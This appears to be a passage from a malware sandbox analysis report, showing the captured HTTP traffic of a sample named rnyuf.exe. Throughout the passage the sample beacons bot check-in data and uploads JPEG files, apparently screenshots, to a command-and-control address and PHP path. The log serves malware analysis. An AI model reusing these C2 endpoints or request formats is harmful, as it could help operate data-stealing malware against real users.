                                        Aug 29, 2021 22:28:05.654604912 CEST13088OUTData Raw: 53 15 1b 68 d6 d2 72 8f 8a af ac 47 a9 5c ac e6 68 ad e9 3c 3c df c0 ea 6a ac 9a 25 ca 74 5c 8f 6a b5 5a 0f a8 9a 6b 74 65 d2 d5 97 b0 b8 8f ac 6c 3f 0a 81 a2 71 d5 4d 5a 92 62 19 9a 5a 31 8a 00 aa 10 52 e6 92 81 40 0e 06 9d 9a 65 38 75 a6 48 f0
                                        Data Ascii: ShrG\h<<j%t\jZktel?qMZbZ1R@e8uHjqGTY&1{3IN4,}RZJZJ)h@J(4Q@hQ(Q@Q@SiGZ-QM(R)@8pN"1NWbHJm<MK)#)i8R1E^)hh
                                        Aug 29, 2021 22:28:05.654753923 CEST13096OUTData Raw: 56 1d 46 29 a0 8f 5a 0b 0f 5a 61 61 c6 9b 46 45 19 a5 74 00 69 28 26 90 9a 40 38 53 c5 30 1a 76 6a 93 13 40 7a d1 de 90 9a 33 9a 00 53 47 6a 05 14 08 51 4b 8a 07 34 13 8a a0 0a 5f 7a 40 68 cd 02 b0 f1 4b 4d 07 9a 75 32 42 90 d2 d0 69 80 83 a5 2e
                                        Data Ascii: VF)ZZaaFEti(&@8S0vj@z3SGjQK4_z@hKMu2Bi.(P1NP)uJdZ`(65DfNM>0R(Jh;u4pxBcRzEM"e4`GqC;S39,>L2,:4
                                        Aug 29, 2021 22:28:05.654814005 CEST13101OUTData Raw: 4b 96 37 fe b7 7f e4 64 d4 af 14 b1 47 14 92 45 22 47 32 96 8d 99 48 0e 01 20 90 7b 8c 82 38 ee 2a 2a e9 f5 1d 2f 56 b9 f0 9f 86 2f ed 34 fb a9 6d 6d ed 26 f3 2e 12 06 68 a3 22 e6 43 f3 36 36 8e dd 4d 6d 39 f2 b5 e6 ed f9 99 46 1c c9 99 bf d8 1a
                                        Data Ascii: K7dGE"G2H {8**/V/4mm&.h"C66Mm9F3>e-le|(1q+2yK22! `F@'W}a}ZLCQnt$,e#,0OA-Qn-G?l.Kn,>U cb_2_c
                                        Aug 29, 2021 22:28:05.763569117 CEST13144INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:28:05 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        184192.168.2.44992346.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:28:05.743714094 CEST13144OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:28:05.829788923 CEST13145INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:28:05 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        185192.168.2.44992446.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:28:06.044956923 CEST13146OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:28:06.116874933 CEST13159INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:28:06 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        186192.168.2.44992546.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:28:06.092088938 CEST13146OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----412e85b07ebc931c9305d6d7a5d96d3c
                                        Host: 46.17.96.36
                                        Content-Length: 107128
                                        Cache-Control: no-cache
                                        Aug 29, 2021 22:28:06.092171907 CEST13146OUTData Raw: 2d 2d 2d 2d 2d 2d 34 31 32 65 38 35 62 30 37 65 62 63 39 33 31 63 39 33 30 35 64 36 64 37 61 35 64 39 36 64 33 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------412e85b07ebc931c9305d6d7a5d96d3cContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:28:06.092422009 CEST13156OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                        Aug 29, 2021 22:28:06.092498064 CEST13159OUTData Raw: 28 a0 06 e3 14 94 fa 31 45 82 e3 29 71 ed 4e 2b 48 45 2b 0e e3 68 22 97 14 51 60 b8 dc 50 69 71 45 03 1b 8e 69 71 4b 45 20 b8 da 4c 53 b1 46 28 b0 c6 e2 8c 53 b1 49 4a c1 71 39 a3 9a 31 46 28 18 94 52 d1 cd 20 1a 68 c5 2d 14 0c 6d 14 ea 28 01 a6
                                        Data Ascii: (1E)qN+HE+h"Q`PiqEiqKE LSF(SIJq91F(R h-m(R(RJZ((,QN4X.%-sNBJ\QLJ)h4wSZu_*>*:0}7{S:r^#(psQ3\zyjf-N~ck
                                        Aug 29, 2021 22:28:06.127814054 CEST13173OUTData Raw: 14 4e 49 3f af e4 6b c5 3e 37 7f c9 47 97 fe bd 62 fe 55 ef 1a 0f 87 5f 4e b9 9b 52 d4 6e 7e d9 aa dc 0c 49 36 30 a8 bf dd 51 d8 7f 9e 2b c1 fe 36 ff 00 c9 47 9b fe bd a2 fe 55 cd cd 1e 68 c2 2e e9 2d ce 95 19 72 ca 72 56 6d ec 79 cd 2d 1c d1 cd
                                        Data Ascii: NI?k>7GbU_NRn~I60Q+6GUh.-rrVmy-j@QE{G`i.tt{>`o;g8k<)rQXTnA*A\so&?!l9+J')^?G*+?j:S7?tj?f
                                        Aug 29, 2021 22:28:06.127895117 CEST13179OUTData Raw: 00 77 35 ca 2f 89 75 a5 bc 9e e7 ed 70 b9 9e 14 82 48 64 b5 89 e0 31 a6 36 a8 84 a9 8c 05 c7 18 5e 39 c7 53 55 6f 75 4d 4b 53 8e e2 3b db b3 2a 5c 5c 0b 99 41 45 1b a4 0b b4 1e 07 40 a7 01 7a 01 d0 0a e5 f6 75 3f af 4b 7f c1 f5 3a 7d a5 36 ef fd
                                        Data Ascii: w5/upHd16^9SUouMKS;*\\AE@zu?K:}6wvrxfEt_-t}NCy0ms;cqBVeq?u4Wv&4,11bsWX&obldP7*\qqUV;cm|#?eR7WX{H^_U`_YiOy
                                        Aug 29, 2021 22:28:06.127918959 CEST13182OUTData Raw: f4 b5 ad fd 75 3d b2 d3 5b b7 d7 e1 f0 fd f4 18 05 af 19 64 8f 39 28 e2 de 6c 8f f3 da bc 5b e3 3f fc 94 39 bf eb da 2f e5 5d 27 80 ee 58 f8 d6 ce 18 8b 25 b4 92 49 27 95 9c 80 44 52 01 f9 06 23 35 cd fc 65 ff 00 92 87 37 fd 7b c5 ff 00 a0 d7 95
                                        Data Ascii: u=[d9(l[?9/]'X%I'DR#5e7{ZP[[gBs{GRKE%;oij}p&kN^.MH/<[B"<c/ci7qZ[S,*{{{KO^gr.ry/(A}+!76
                                        Aug 29, 2021 22:28:06.128051996 CEST13185OUTData Raw: c9 6e 8e 78 21 1e b4 a1 71 5b de 5d b3 75 41 49 f6 3b 56 f6 a3 d8 8f eb 2b aa 30 f1 4e 03 35 b2 74 d8 8f dd 62 29 87 4a 3d 9c 7e 22 8f 64 d0 7d 62 06 5e da 70 15 7c e9 92 8e 98 35 1b 58 cc bc ed a3 91 87 b5 8b ea 56 c5 2e 2a 53 6e e3 aa 9a 6f 96
                                        Data Ascii: nx!q[]uAI;V+0N5tb)J=~"d}b^p|5XV.*SnoGo(OhNT7O)UCe*ANO3+<]S<y^G^]*chT)Fc)K|]j}(BK,K\S&Kp+b1Eq1Y
                                        Aug 29, 2021 22:28:06.163054943 CEST13187OUTData Raw: db 47 8e 09 21 7b 57 b9 cb 36 65 79 23 75 7d bf 2b a6 fc 06 c1 c8 ce 46 18 8a ae ba db 9f 11 69 3a c9 b3 20 e9 c9 68 a2 1f 37 fd 67 90 aa 3e f6 38 dd b7 d0 e3 3d e9 c1 d6 be bd ff 00 0d 45 35 47 5b 7f 5b 17 f5 2d 06 da 0f 0a da 6a 96 73 4d 25 d6
                                        Data Ascii: G!{W6ey#u}+Fi: h7g>8=E5G[[-jsM%$ N+8@nf7muxuydTK<& L6G42E#K3jP{;GwR7`+,PPt*NOJ-KV-?3a:X2IM3
                                        Aug 29, 2021 22:28:06.163091898 CEST13190OUTData Raw: 53 15 1b 68 d6 d2 72 8f 8a af ac 47 a9 5c ac e6 68 ad e9 3c 3c df c0 ea 6a ac 9a 25 ca 74 5c 8f 6a b5 5a 0f a8 9a 6b 74 65 d2 d5 97 b0 b8 8f ac 6c 3f 0a 81 a2 71 d5 4d 5a 92 62 19 9a 5a 31 8a 00 aa 10 52 e6 92 81 40 0e 06 9d 9a 65 38 75 a6 48 f0
                                        Data Ascii: ShrG\h<<j%t\jZktel?qMZbZ1R@e8uHjqGTY&1{3IN4,}RZJZJ)h@J(4Q@hQ(Q@Q@SiGZ-QM(R)@8pN"1NWbHJm<MK)#)i8R1E^)hh
                                        Aug 29, 2021 22:28:06.163279057 CEST13198OUTData Raw: 54 8e cc dc 87 52 90 74 94 fe 75 a3 06 ab 70 3f e5 a9 35 ca 23 94 61 5a 76 ce 49 ae 5a b8 78 5b 63 d1 c3 63 6a 37 6b 9d 47 88 27 79 bc 15 23 b7 52 6b c7 e5 3f 31 af 56 d7 1f 1e 03 6f f7 ab c9 64 ea 69 65 8a d4 e5 ea 77 e3 f5 ab 16 fb 23 da 74 67
                                        Data Ascii: TRtup?5#aZvIZx[ccj7kG'y#Rk?1Vodiew#tg<J):\P3EgyWNO;Qdoi_qT=iv_FL.PR_^Ei%CVUR[.},s2hwalT-a:pcqWdTSin$<
                                        Aug 29, 2021 22:28:06.268516064 CEST13255INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:28:06 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        187192.168.2.44992646.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:28:06.278475046 CEST13255OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:28:06.350850105 CEST13256INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:28:06 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        188192.168.2.44992746.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:28:06.559009075 CEST13256OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:28:06.631181955 CEST13295INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:28:06 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        189192.168.2.44992846.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:28:06.571857929 CEST13257OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----412e85b07ebc931c9305d6d7a5d96d3c
                                        Host: 46.17.96.36
                                        Content-Length: 107128
                                        Cache-Control: no-cache
                                        Aug 29, 2021 22:28:06.571968079 CEST13257OUTData Raw: 2d 2d 2d 2d 2d 2d 34 31 32 65 38 35 62 30 37 65 62 63 39 33 31 63 39 33 30 35 64 36 64 37 61 35 64 39 36 64 33 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------412e85b07ebc931c9305d6d7a5d96d3cContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:28:06.572149992 CEST13267OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                        Aug 29, 2021 22:28:06.572263956 CEST13270OUTData Raw: 28 a0 06 e3 14 94 fa 31 45 82 e3 29 71 ed 4e 2b 48 45 2b 0e e3 68 22 97 14 51 60 b8 dc 50 69 71 45 03 1b 8e 69 71 4b 45 20 b8 da 4c 53 b1 46 28 b0 c6 e2 8c 53 b1 49 4a c1 71 39 a3 9a 31 46 28 18 94 52 d1 cd 20 1a 68 c5 2d 14 0c 6d 14 ea 28 01 a6
                                        Data Ascii: (1E)qN+HE+h"Q`PiqEiqKE LSF(SIJq91F(R h-m(R(RJZ((,QN4X.%-sNBJ\QLJ)h4wSZu_*>*:0}7{S:r^#(psQ3\zyjf-N~ck
                                        Aug 29, 2021 22:28:06.604933977 CEST13273OUTData Raw: 14 4e 49 3f af e4 6b c5 3e 37 7f c9 47 97 fe bd 62 fe 55 ef 1a 0f 87 5f 4e b9 9b 52 d4 6e 7e d9 aa dc 0c 49 36 30 a8 bf dd 51 d8 7f 9e 2b c1 fe 36 ff 00 c9 47 9b fe bd a2 fe 55 cd cd 1e 68 c2 2e e9 2d ce 95 19 72 ca 72 56 6d ec 79 cd 2d 1c d1 cd
                                        Data Ascii: NI?k>7GbU_NRn~I60Q+6GUh.-rrVmy-j@QE{G`i.tt{>`o;g8k<)rQXTnA*A\so&?!l9+J')^?G*+?j:S7?tj?f
                                        Aug 29, 2021 22:28:06.604994059 CEST13283OUTData Raw: 71 e8 69 3e c7 75 f6 98 6d be cb 3f 9f 38 43 14 5e 59 dd 20 7c 6d da 31 93 9c 8c 63 ae 6b 27 46 32 77 6f 52 d5 59 25 64 8f a0 f5 8f 88 1f 0f 13 c2 5a ed 8e 91 a9 e2 e6 f6 c6 68 51 3c 8b 8f 9d cc 6c 14 65 97 03 96 f6 af 9d 2a 79 ad 2e ad e1 86 69
                                        Data Ascii: qi>um?8C^Y |m1ck'F2woRY%dZhQ<le*y.i)yO$eVM\q$:&"[1I-$"&$1@UFL)QG4Z9)QERRR({sLJQKH(f@w(OxG?+,k4ja'P@9oa
                                        Aug 29, 2021 22:28:06.605098009 CEST13290OUTData Raw: 00 77 35 ca 2f 89 75 a5 bc 9e e7 ed 70 b9 9e 14 82 48 64 b5 89 e0 31 a6 36 a8 84 a9 8c 05 c7 18 5e 39 c7 53 55 6f 75 4d 4b 53 8e e2 3b db b3 2a 5c 5c 0b 99 41 45 1b a4 0b b4 1e 07 40 a7 01 7a 01 d0 0a e5 f6 75 3f af 4b 7f c1 f5 3a 7d a5 36 ef fd
                                        Data Ascii: w5/upHd16^9SUouMKS;*\\AE@zu?K:}6wvrxfEt_-t}NCy0ms;cqBVeq?u4Wv&4,11bsWX&obldP7*\qqUV;cm|#?eR7WX{H^_U`_YiOy
                                        Aug 29, 2021 22:28:06.605118036 CEST13295OUTData Raw: f4 b5 ad fd 75 3d b2 d3 5b b7 d7 e1 f0 fd f4 18 05 af 19 64 8f 39 28 e2 de 6c 8f f3 da bc 5b e3 3f fc 94 39 bf eb da 2f e5 5d 27 80 ee 58 f8 d6 ce 18 8b 25 b4 92 49 27 95 9c 80 44 52 01 f9 06 23 35 cd fc 65 ff 00 92 87 37 fd 7b c5 ff 00 a0 d7 95
                                        Data Ascii: u=[d9(l[?9/]'X%I'DR#5e7{ZP[[gBs{GRKE%;oij}p&kN^.MH/<[B"<c/ci7qZ[S,*{{{KO^gr.ry/(A}+!76
                                        Aug 29, 2021 22:28:06.637507915 CEST13298OUTData Raw: db 47 8e 09 21 7b 57 b9 cb 36 65 79 23 75 7d bf 2b a6 fc 06 c1 c8 ce 46 18 8a ae ba db 9f 11 69 3a c9 b3 20 e9 c9 68 a2 1f 37 fd 67 90 aa 3e f6 38 dd b7 d0 e3 3d e9 c1 d6 be bd ff 00 0d 45 35 47 5b 7f 5b 17 f5 2d 06 da 0f 0a da 6a 96 73 4d 25 d6
                                        Data Ascii: G!{W6ey#u}+Fi: h7g>8=E5G[[-jsM%$ N+8@nf7muxuydTK<& L6G42E#K3jP{;GwR7`+,PPt*NOJ-KV-?3a:X2IM3
                                        Aug 29, 2021 22:28:06.637577057 CEST13301OUTData Raw: 53 15 1b 68 d6 d2 72 8f 8a af ac 47 a9 5c ac e6 68 ad e9 3c 3c df c0 ea 6a ac 9a 25 ca 74 5c 8f 6a b5 5a 0f a8 9a 6b 74 65 d2 d5 97 b0 b8 8f ac 6c 3f 0a 81 a2 71 d5 4d 5a 92 62 19 9a 5a 31 8a 00 aa 10 52 e6 92 81 40 0e 06 9d 9a 65 38 75 a6 48 f0
                                        Data Ascii: ShrG\h<<j%t\jZktel?qMZbZ1R@e8uHjqGTY&1{3IN4,}RZJZJ)h@J(4Q@hQ(Q@Q@SiGZ-QM(R)@8pN"1NWbHJm<MK)#)i8R1E^)hh
                                        Aug 29, 2021 22:28:06.637650013 CEST13322OUTData Raw: 54 8e cc dc 87 52 90 74 94 fe 75 a3 06 ab 70 3f e5 a9 35 ca 23 94 61 5a 76 ce 49 ae 5a b8 78 5b 63 d1 c3 63 6a 37 6b 9d 47 88 27 79 bc 15 23 b7 52 6b c7 e5 3f 31 af 56 d7 1f 1e 03 6f f7 ab c9 64 ea 69 65 8a d4 e5 ea 77 e3 f5 ab 16 fb 23 da 74 67
                                        Data Ascii: TRtup?5#aZvIZx[ccj7kG'y#Rk?1Vodiew#tg<J):\P3EgyWNO;Qdoi_qT=iv_FL.PR_^Ei%CVUR[.},s2hwalT-a:pcqWdTSin$<
                                        Aug 29, 2021 22:28:06.739362001 CEST13365INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:28:06 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 0
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        19192.168.2.44975446.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:27:16.987798929 CEST3068OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----6f2b8ec125833bffe61c308b0401688c
                                        Host: 46.17.96.36
                                        Content-Length: 107127
                                        Cache-Control: no-cache
                                        Aug 29, 2021 22:27:16.987987995 CEST3068OUTData Raw: 2d 2d 2d 2d 2d 2d 36 66 32 62 38 65 63 31 32 35 38 33 33 62 66 66 65 36 31 63 33 30 38 62 30 34 30 31 36 38 38 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------6f2b8ec125833bffe61c308b0401688cContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:27:16.988267899 CEST3078OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                        Aug 29, 2021 22:27:16.988599062 CEST3081OUTData Raw: 28 a0 06 e3 14 94 fa 31 45 82 e3 29 71 ed 4e 2b 48 45 2b 0e e3 68 22 97 14 51 60 b8 dc 50 69 71 45 03 1b 8e 69 71 4b 45 20 b8 da 4c 53 b1 46 28 b0 c6 e2 8c 53 b1 49 4a c1 71 39 a3 9a 31 46 28 18 94 52 d1 cd 20 1a 68 c5 2d 14 0c 6d 14 ea 28 01 a6
                                        Data Ascii: (1E)qN+HE+h"Q`PiqEiqKE LSF(SIJq91F(R h-m(R(RJZ((,QN4X.%-sNBJ\QLJ)h4wSZu_*>*:0}7{S:r^#(psQ3\zyjf-N~ck
                                        Aug 29, 2021 22:27:17.023124933 CEST3086OUTData Raw: 14 4e 49 3f af e4 6b c5 3e 37 7f c9 47 97 fe bd 62 fe 55 ef 1a 0f 87 5f 4e b9 9b 52 d4 6e 7e d9 aa dc 0c 49 36 30 a8 bf dd 51 d8 7f 9e 2b c1 fe 36 ff 00 c9 47 9b fe bd a2 fe 55 cd cd 1e 68 c2 2e e9 2d ce 95 19 72 ca 72 56 6d ec 79 cd 2d 1c d1 cd
                                        Data Ascii: NI?k>7GbU_NRn~I60Q+6GUh.-rrVmy-j@QE{G`i.tt{>`o;g8k<)rQXTnA*A\so&?!l9+J')^?G*+?j:S7?tj?f
                                        Aug 29, 2021 22:27:17.023384094 CEST3089OUTData Raw: ba 35 bf 88 de d6 e3 7c 45 70 f3 c4 b7 53 79 90 27 f7 5b 23 71 5f e2 0b 81 d3 0d 24 13 e8 cb e3 9f 08 c7 71 a7 6a 32 5f 79 1a 58 13 47 7c 89 10 3b 23 c6 63 30 93 c7 71 bf 9f 6a f3 61 0c 7e 94 a2 14 03 00 70 69 c6 8c 93 bd fa df f3 ff 00 30 9d 65
                                        Data Ascii: 5|EpSy'[#q_$qj2_yXG|;#c0qja~pi0e+hwxv+u0\?U?]Lo.<N|Wr6D$?m9A8q/A=*VVbMobiGFb)|lJ(EQ!EPIKI@QQbQ@
                                        Aug 29, 2021 22:27:17.023550987 CEST3101OUTData Raw: 24 05 14 62 8c 52 18 62 83 4b 48 69 88 4a 28 a2 90 c4 34 52 d2 e2 80 1b 8a 29 d8 a4 a0 04 14 b4 86 96 80 12 96 93 bd 2f 6a 00 28 a2 8a 00 29 45 27 7a 5e d4 00 51 47 6a 05 31 0b 45 14 50 20 a2 96 8a 60 14 b4 52 53 10 51 45 2d 00 14 b4 51 40 0b 45
                                        Data Ascii: $bRbKHiJ(4R)/j()E'z^QGj1EP `RSQE-Q@E(QE--)(P)ZZJQS4Z(dKIKL)hRP)xQuU3N*%@ip34$S4iSdUA5.6Sbj}+"z*c4Z2c1J.=-.(p
                                        Aug 29, 2021 22:27:17.023849964 CEST3106OUTData Raw: f4 b5 ad fd 75 3d b2 d3 5b b7 d7 e1 f0 fd f4 18 05 af 19 64 8f 39 28 e2 de 6c 8f f3 da bc 5b e3 3f fc 94 39 bf eb da 2f e5 5d 27 80 ee 58 f8 d6 ce 18 8b 25 b4 92 49 27 95 9c 80 44 52 01 f9 06 23 35 cd fc 65 ff 00 92 87 37 fd 7b c5 ff 00 a0 d7 95
                                        Data Ascii: u=[d9(l[?9/]'X%I'DR#5e7{ZP[[gBs{GRKE%;oij}p&kN^.MH/<[B"<c/ci7qZ[S,*{{{KO^gr.ry/(A}+!76
                                        Aug 29, 2021 22:27:17.058459044 CEST3117OUTData Raw: db 47 8e 09 21 7b 57 b9 cb 36 65 79 23 75 7d bf 2b a6 fc 06 c1 c8 ce 46 18 8a ae ba db 9f 11 69 3a c9 b3 20 e9 c9 68 a2 1f 37 fd 67 90 aa 3e f6 38 dd b7 d0 e3 3d e9 c1 d6 be bd ff 00 0d 45 35 47 5b 7f 5b 17 f5 2d 06 da 0f 0a da 6a 96 73 4d 25 d6
                                        Data Ascii: G!{W6ey#u}+Fi: h7g>8=E5G[[-jsM%$ N+8@nf7muxuydTK<& L6G42E#K3jP{;GwR7`+,PPt*NOJ-KV-?3a:X2IM3
                                        Aug 29, 2021 22:27:17.058510065 CEST3127OUTData Raw: 1c a2 16 0a 36 95 e0 48 07 5a bf 79 7f a3 c5 e3 ab fd 76 2d 6e d2 e2 d6 f0 de 6d 48 a1 9c 48 9e 64 12 2a ee 0d 18 1c b3 01 c1 3d 7d 39 a7 ed ea 59 bb 7f 37 e1 b0 4a 85 3b d9 3e a6 24 1a 3c af 15 ec b7 57 16 f6 29 63 70 96 d7 26 e3 7f ee dd b7 e3
                                        Data Ascii: 6HZyv-nmHHd*=}9Y7J;>$<W)cp&V$,Wn|/,76yqs*d$v5U]r;eex+\kl)BD]:'h<7 I\KYhqOU2}.KqcMp4M*R6v6
